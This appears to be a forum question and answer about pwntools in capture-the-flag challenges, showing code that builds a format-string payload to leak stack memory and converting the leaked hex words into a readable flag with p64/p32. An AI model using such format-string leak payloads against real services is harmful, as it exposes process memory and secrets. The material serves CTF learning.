I've been learning the pwntools python library and using it to build solutions to CTF challenges. One thing I keep running into is that, after a successful exploit (say of a format string vulnerability) where I get the program to leak the memory I want, it's a pain to format the output in such a way as to easily read the flag.
This feels like something that there is a one-liner inside of pwntools to address, but I have not been able to find it.
My current solution (which works) seems like it's harder than it needs to be, so I'm hoping I'm just blind and missing the one-liner I suspect is there.
Here is what I'm doing now:
for n in range(32, 32+16):
payload += "%" + str(n) + "$x."
r.send(payload)
r.send("\n")
# disregard one line
r.recvline()
# this is where I get my memory leak, in the form of hex numbers seperated by '.'
data = r.recvline()
dataBytes = data.split(b'.')
answer = b''
for db in dataBytes:
# pad the bytes to full width
while len(db) < 8:
db = b'0' + db
i = int.from_bytes(unhex(db))
answer += pack(i,endian="little")
print( answer )
You actually don't need to pad the hex to 8 characters first. int(x, 16) will handle short hex just fine.
For example, if you know you're leaking 64-bit values:
data = r.recvline().strip().split(b'.')
answer = b''.join(p64(int(x, 16)) for x in data)
print(answer)
If you’re on a 32‐bit challenge, just swap in p32